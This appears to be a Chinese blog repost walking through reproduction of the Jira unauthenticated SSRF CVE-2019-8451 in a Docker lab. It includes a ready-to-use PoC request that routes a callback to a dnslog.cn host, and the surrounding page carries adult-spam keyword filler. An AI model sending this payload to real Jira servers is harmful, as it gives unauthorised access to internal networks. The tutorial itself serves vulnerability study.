91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

發布時間:2021-12-10 15:38:49 來源:億速云 閱讀:341 作者:柒染 欄目:大數據

這期內容當中小編將會給大家帶來有關Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析,文章內容豐富且以專業的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。

0x00 簡介


JIRA是Atlassian公司出品的項目與事務跟蹤工具,被廣泛應用于缺陷跟蹤、客戶服務、需求收集、流程審批、任務跟蹤、項目跟蹤和敏捷管理等工作領域。

0x01 漏洞概述


Jira的/plugins/servlet/gadgets/makeRequest資源存在SSRF漏洞,原因在于JiraWhitelist這個類的邏輯缺陷,成功利用此漏洞的遠程攻擊者可以以Jira服務端的身份訪問內網資源。經分析,此漏洞無需任何憑據即可觸發。(來自奇安信CERT)

0x02 影響范圍


Jira < 8.4.0

0x03 環境搭建


在線靶場

開放時間(當前-9月29日20:00)

獲取方式(完成任意一個):

1、將本文轉發至朋友圈并配文字,截圖發至公眾號內

2、聯系作者,五元紅包

自行搭建

使用docker進行搭建,執行以下命令開啟環境

docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

訪問ip:8080進行安裝

下圖選擇第二個

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

繼續即可

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

點擊next,后面漏了兩張圖

去生成JIRA使用許可證

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

生成之后找到License Key,回到頁面填上License Key繼續安裝

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

至此,安裝完畢。

0x04 漏洞利用


先訪問ip:8080,然后刷新抓包

將數據包替換為如下Poc:

GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1Host: 192.168.198.133:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.198.133:8080/secure/Dashboard.jspaX-Atlassian-Token: no-checkContent-Length: 2

其中ip替換為目標ip,共三處

@后面改為你的dnslog的地址

repeater發包

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

去dnslog中刷新查看結果,可以看到有流量經過

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

如果訪問未開放端口,結果是這樣的:

Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析

上述就是小編為大家分享的Jira未授權SSRF產生CVE-2019-8451漏洞復現的示例分析了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關知識,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

乌兰县| 岳池县| 措勤县| 荥经县| 托克逊县| 武山县| 康保县| 沧州市| 金堂县| 淅川县| 迁安市| 全州县| 彭阳县| 新民市| 韶山市| 文安县| 平和县| 昭觉县| 丁青县| 柯坪县| 玉屏| 中西区| 峨山| 乌鲁木齐县| 凤凰县| 都江堰市| 贵定县| 德昌县| 镇康县| 临泽县| 鲁甸县| 雅安市| 武夷山市| 东平县| 三江| 北海市| 根河市| 商南县| 分宜县| 杭锦后旗| 蕲春县|